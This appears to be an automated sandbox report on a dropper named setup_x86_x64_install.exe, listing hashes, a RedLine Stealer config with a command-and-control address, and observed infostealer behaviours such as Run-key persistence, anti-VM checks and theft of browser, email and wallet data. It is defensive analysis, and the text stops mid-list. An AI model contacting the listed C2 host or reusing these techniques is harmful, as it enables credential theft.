Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
357s -
max time network
1801s -
platform
windows11_x64 -
resource
win11 -
submitted
22-09-2021 05:21
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
redline
janesam
65.108.20.195:6774
Signatures
-
Process spawned unexpected child process 10 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4840 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1616 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9292 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1716 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1308 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3992 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2876 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 11204 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3712 4936 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8256 4936 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5644-301-0x0000000007620000-0x0000000007645000-memory.dmp family_redline behavioral4/memory/4600-309-0x00000000055E0000-0x00000000055FD000-memory.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun19262b9e49ad.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun19262b9e49ad.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 33 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeschtasks.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exerundll32.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe1C54.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5572 created 3796 5572 WerFault.exe Sun19eb40faaaa9.exe PID 5548 created 4888 5548 WerFault.exe Sun19de8ff4b6aefeb8.exe PID 5528 created 4792 5528 WerFault.exe Sun1908b94df837b3158.exe PID 2472 created 5960 2472 WerFault.exe 2.exe PID 4040 created 5472 4040 WerFault.exe 5.exe PID 2416 created 2828 2416 WerFault.exe Soqemaeroci.exe PID 5572 created 3224 5572 WerFault.exe rundll32.exe PID 2880 created 6060 2880 WerFault.exe setup.exe PID 5052 created 5200 5052 WerFault.exe udptest.exe PID 2876 created 2568 2876 schtasks.exe 6273333.exe PID 5912 created 5008 5912 WerFault.exe Sun19262b9e49ad.exe PID 2556 created 828 2556 WerFault.exe rundll32.exe PID 7100 created 11848 7100 WerFault.exe GcleanerEU.exe PID 9564 created 9360 9564 WerFault.exe rundll32.exe PID 11308 created 7776 11308 WerFault.exe gcleaner.exe PID 1716 created 10836 1716 rundll32.exe vlIqRV07HW3kqFelCZOkt0MM.exe PID 4612 created 10956 4612 WerFault.exe WMIC.exe PID 1660 created 10828 1660 WerFault.exe WTiHSAoOx_dy7OYTEgv2_0xJ.exe PID 7064 created 10908 7064 WerFault.exe _FN2uAQi_DUvoSKH655mbuGd.exe PID 7768 created 10980 7768 WerFault.exe msedge.exe PID 8504 created 11888 8504 1C54.exe IhD_cGja2hQK007Xo3oRfmju.exe PID 9756 created 2260 9756 WerFault.exe rR89OztMpbFDOjJIIB7g3CdE.exe PID 5296 created 10964 5296 WerFault.exe TEhD1bOy1S_w6Qmtqwurmrov.exe PID 9436 created 8836 9436 WerFault.exe explorer.exe PID 2324 created 11000 2324 WerFault.exe qz1g6FwKh2_0rwbOwBR3xZ5a.exe PID 5296 created 6284 5296 WerFault.exe bIp1yoESzg4Kx9i3VHOo82l7.exe PID 6584 created 9712 6584 WerFault.exe rundll32.exe PID 6568 created 1464 6568 WerFault.exe BC13.exe PID 7748 created 8160 7748 WerFault.exe 1937106983.exe PID 8492 created 11836 8492 WerFault.exe rundll32.exe PID 2460 created 1496 2460 WerFault.exe DAB7.exe PID 5736 created 9228 5736 WerFault.exe C3D2.exe PID 7760 created 11588 7760 WerFault.exe dwm.exe -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral4/memory/3796-284-0x00000000009F0000-0x0000000000AC4000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 51 IoCs
Processes:
cmd.execmd.exerundll32.execmd.exepowershell.exeMsiExec.exeflow pid process 37 5644 cmd.exe 60 2996 cmd.exe 63 5644 cmd.exe 70 2996 cmd.exe 92 1308 rundll32.exe 235 9676 cmd.exe 237 7032 powershell.exe 254 9676 cmd.exe 318 9812 MsiExec.exe 324 9812 MsiExec.exe 326 9812 MsiExec.exe 330 9812 MsiExec.exe 332 9812 MsiExec.exe 337 9812 MsiExec.exe 340 9812 MsiExec.exe 341 9812 MsiExec.exe 343 9812 MsiExec.exe 351 9812 MsiExec.exe 352 9812 MsiExec.exe 353 9812 MsiExec.exe 355 9812 MsiExec.exe 356 9812 MsiExec.exe 357 9812 MsiExec.exe 358 9812 MsiExec.exe 359 9812 MsiExec.exe 360 9812 MsiExec.exe 361 9812 MsiExec.exe 362 9812 MsiExec.exe 363 9812 MsiExec.exe 364 9812 MsiExec.exe 365 9812 MsiExec.exe 366 9812 MsiExec.exe 367 9812 MsiExec.exe 369 9812 MsiExec.exe 370 9812 MsiExec.exe 371 9812 MsiExec.exe 372 9812 MsiExec.exe 374 9812 MsiExec.exe 375 9812 MsiExec.exe 376 9812 MsiExec.exe 377 9812 MsiExec.exe 380 9812 MsiExec.exe 382 9812 MsiExec.exe 383 9812 MsiExec.exe 384 9812 MsiExec.exe 385 9812 MsiExec.exe 387 9812 MsiExec.exe 388 9812 MsiExec.exe 389 9812 MsiExec.exe 392 9812 MsiExec.exe 395 9812 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
description ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSun19e4ade31b2a.exeSun1908b94df837b3158.exeSun1917b8fb5f09db8.exeSun19de8ff4b6aefeb8.exeSun191101c1aaa.exeSun193fda712d9f1.exeSun19262b9e49ad.exeSun195a1614ec24e6a.exeSun19eb40faaaa9.exeSun198361825f4.exeSun1905815e51282417.exeSun1966fb31dd5a07.exeSun1966fb31dd5a07.tmpZe2ro.exeLzmwAqmV.exe7916863.scr7777711.scrChrome 5.exePublicDwlBrowser1100.exe2.exesetup.exeudptest.exe5.exeLivelyScreenRecF18.exe7559937.scrSoqemaeroci.exesetup_2.exe3002.exeWMIC.exe5699436.exejhuuee.exesetup_2.exe5423133.scr2919824.scrBearVpn 3.exesetup_2.tmpcmd.exe2177726.exe6273333.exeBandicam.exe210921.exe6273333.exeConhost.exeultramediaburner.exeservices64.exeultramediaburner.tmpCaeqaelowaece.exeUltraMediaBurner.exeGcleanerEU.exeinstaller.exerundll32.exeautosubplayer.exegcleaner.exeWTiHSAoOx_dy7OYTEgv2_0xJ.exevlIqRV07HW3kqFelCZOkt0MM.exeSybJG571i76TzTlmcO2BDMTX.exe_FN2uAQi_DUvoSKH655mbuGd.exe2Y2DEk6oDEFLyMtOS38apbFJ.exeLK2tJGajftEeLSBc6rXxeDhR.exeAM5Isb_OcTUzof9dlnE4LHY2.exeTEhD1bOy1S_w6Qmtqwurmrov.exepid process 3068 setup_installer.exe 3732 setup_install.exe 5084 Sun19e4ade31b2a.exe 4792 Sun1908b94df837b3158.exe 1652 Sun1917b8fb5f09db8.exe 4888 Sun19de8ff4b6aefeb8.exe 4808 Sun191101c1aaa.exe 3924 Sun193fda712d9f1.exe 5008 Sun19262b9e49ad.exe 4600 Sun195a1614ec24e6a.exe 3796 Sun19eb40faaaa9.exe 1644 Sun198361825f4.exe 1104 Sun1905815e51282417.exe 2988 Sun1966fb31dd5a07.exe 1188 Sun1966fb31dd5a07.tmp 5304 Ze2ro.exe 5384 LzmwAqmV.exe 5536 7916863.scr 5644 7777711.scr 5752 Chrome 5.exe 5836 PublicDwlBrowser1100.exe 5960 2.exe 6060 setup.exe 5200 udptest.exe 5472 5.exe 4808 LivelyScreenRecF18.exe 5596 7559937.scr 2828 Soqemaeroci.exe 5556 setup_2.exe 1960 3002.exe 1520 WMIC.exe 5924 5699436.exe 5992 jhuuee.exe 6016 setup_2.exe 5236 5423133.scr 4928 2919824.scr 3248 BearVpn 3.exe 5020 setup_2.tmp 2996 cmd.exe 1720 2177726.exe 2568 6273333.exe 3364 Bandicam.exe 6004 210921.exe 1556 6273333.exe 5456 Conhost.exe 5800 ultramediaburner.exe 4592 services64.exe 2828 Soqemaeroci.exe 6128 ultramediaburner.tmp 5628 Caeqaelowaece.exe 5612 UltraMediaBurner.exe 11848 GcleanerEU.exe 5220 installer.exe 1308 rundll32.exe 7484 autosubplayer.exe 7776 gcleaner.exe 10828 WTiHSAoOx_dy7OYTEgv2_0xJ.exe 10836 vlIqRV07HW3kqFelCZOkt0MM.exe 10900 SybJG571i76TzTlmcO2BDMTX.exe 10908 _FN2uAQi_DUvoSKH655mbuGd.exe 10928 2Y2DEk6oDEFLyMtOS38apbFJ.exe 10940 LK2tJGajftEeLSBc6rXxeDhR.exe 10948 AM5Isb_OcTUzof9dlnE4LHY2.exe 10964 TEhD1bOy1S_w6Qmtqwurmrov.exe -
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wtfzFwZ5RcXfsINa7tEGOe7O.exe3427946.scr3924.exe12A0.exe51FC.exe7559937.scr2177726.exeRvYCzJu1nmco14zLRV3AEo5r.exeDone.exeInstall.exeGqxfEzwVgbhMIywGV0_RfsRO.exe210921.exe5827.execmd.exeBandicam.exe5423133.scrSybJG571i76TzTlmcO2BDMTX.exeInstall.exe2Y2DEk6oDEFLyMtOS38apbFJ.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wtfzFwZ5RcXfsINa7tEGOe7O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3427946.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3924.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 12A0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 51FC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7559937.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2177726.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RvYCzJu1nmco14zLRV3AEo5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wtfzFwZ5RcXfsINa7tEGOe7O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Done.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GqxfEzwVgbhMIywGV0_RfsRO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Done.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 210921.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 210921.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5827.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3427946.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5827.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GqxfEzwVgbhMIywGV0_RfsRO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RvYCzJu1nmco14zLRV3AEo5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 51FC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2177726.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Bandicam.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5423133.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SybJG571i76TzTlmcO2BDMTX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SybJG571i76TzTlmcO2BDMTX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7559937.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3924.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 12A0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Bandicam.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5423133.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2Y2DEk6oDEFLyMtOS38apbFJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2Y2DEk6oDEFLyMtOS38apbFJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cmd.exe -
Drops startup file 1 IoCs
Processes:
Bandicam.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk Bandicam.exe -
Loads dropped DLL 51 IoCs
Processes:
setup_install.exeSun1966fb31dd5a07.tmpWMIC.exesetup_2.tmprundll32.exerundll32.exeinstaller.exeautosubplayer.exeMsiExec.exerundll32.execJOoGhW0wL7EgfPdA5zeq_yY.exeSybJG571i76TzTlmcO2BDMTX.exeMsiExec.exerundll32.exerundll32.exeMsiExec.exerundll32.exepid process 3732 setup_install.exe 3732 setup_install.exe 3732 setup_install.exe 3732 setup_install.exe 3732 setup_install.exe 3732 setup_install.exe 3732 setup_install.exe 1188 Sun1966fb31dd5a07.tmp 1520 WMIC.exe 5020 setup_2.tmp 3224 rundll32.exe 828 rundll32.exe 5220 installer.exe 5220 installer.exe 7484 autosubplayer.exe 5220 installer.exe 8552 MsiExec.exe 9360 rundll32.exe 8552 MsiExec.exe 11896 cJOoGhW0wL7EgfPdA5zeq_yY.exe 7484 autosubplayer.exe 10900 SybJG571i76TzTlmcO2BDMTX.exe 9812 MsiExec.exe 10900 SybJG571i76TzTlmcO2BDMTX.exe 10900 SybJG571i76TzTlmcO2BDMTX.exe 9812 MsiExec.exe 9812 MsiExec.exe 9812 MsiExec.exe 9812 MsiExec.exe 9812 MsiExec.exe 9812 MsiExec.exe 10452 rundll32.exe 7484 autosubplayer.exe 7484 autosubplayer.exe 9812 MsiExec.exe 9812 MsiExec.exe 9812 MsiExec.exe 5220 installer.exe 9812 MsiExec.exe 9812 MsiExec.exe 9712 rundll32.exe 7484 autosubplayer.exe 6148 MsiExec.exe 6148 MsiExec.exe 9812 MsiExec.exe 11836 rundll32.exe 7484 autosubplayer.exe 7484 autosubplayer.exe 7484 autosubplayer.exe 7484 autosubplayer.exe 7484 autosubplayer.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
msedge.exe1937106983.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\Relajaxebi.exe\"" Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Install = "\"C:\\PerfLogs\\Install.exe\"" 1937106983.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\odt\\dwm.exe\"" 1937106983.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\ProgramData\\regid.1991-06.com.microsoft\\powershell.exe\"" 1937106983.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\System32\\drt\\conhost.exe\"" 1937106983.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\SysWOW64\\imgutil\\cmd.exe\"" 1937106983.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
5423133.scrGqxfEzwVgbhMIywGV0_RfsRO.exe5827.exe2177726.exeSybJG571i76TzTlmcO2BDMTX.exe2Y2DEk6oDEFLyMtOS38apbFJ.exeDone.exe210921.exe3427946.scr51FC.exe7559937.scrRvYCzJu1nmco14zLRV3AEo5r.exewtfzFwZ5RcXfsINa7tEGOe7O.exeBandicam.exe3924.exe12A0.execmd.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5423133.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GqxfEzwVgbhMIywGV0_RfsRO.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5827.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2177726.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SybJG571i76TzTlmcO2BDMTX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2Y2DEk6oDEFLyMtOS38apbFJ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Done.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 210921.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3427946.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 51FC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7559937.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RvYCzJu1nmco14zLRV3AEo5r.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wtfzFwZ5RcXfsINa7tEGOe7O.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Bandicam.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3924.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 12A0.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exemsiexec.exeInstall.exedescription ioc process File opened (read-only) \??\J: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com 1 ipinfo.io 54 ipinfo.io 113 ip-api.com 140 ipinfo.io 214 ipinfo.io -
Drops file in System32 directory 6 IoCs
Processes:
Install.exeInstall.exe1937106983.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\drt\conhost.exe 1937106983.exe File created C:\Windows\SysWOW64\drt\088424020bedd6b28ac7fd22ee35dcd7322895ce 1937106983.exe File created C:\Windows\SysWOW64\imgutil\cmd.exe 1937106983.exe File created C:\Windows\SysWOW64\imgutil\ebf1f9fa8afd6d1932bd65bc4cc3af89a4c8e228 1937106983.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
Processes:
7559937.scr2177726.exeBandicam.exe5423133.scrSybJG571i76TzTlmcO2BDMTX.exeRvYCzJu1nmco14zLRV3AEo5r.exeGqxfEzwVgbhMIywGV0_RfsRO.exewtfzFwZ5RcXfsINa7tEGOe7O.exe2Y2DEk6oDEFLyMtOS38apbFJ.exeDone.exe210921.execmd.exe3427946.scr3924.exe51FC.exe5827.exe12A0.exepid process 5596 7559937.scr 1720 2177726.exe 3364 Bandicam.exe 5236 5423133.scr 10900 SybJG571i76TzTlmcO2BDMTX.exe 5904 RvYCzJu1nmco14zLRV3AEo5r.exe 11860 GqxfEzwVgbhMIywGV0_RfsRO.exe 2844 wtfzFwZ5RcXfsINa7tEGOe7O.exe 10928 2Y2DEk6oDEFLyMtOS38apbFJ.exe 6780 Done.exe 6004 210921.exe 9676 cmd.exe 3848 3427946.scr 10568 3924.exe 10916 51FC.exe 8736 5827.exe 8048 12A0.exe -
Suspicious use of SetThreadContext 13 IoCs
Processes:
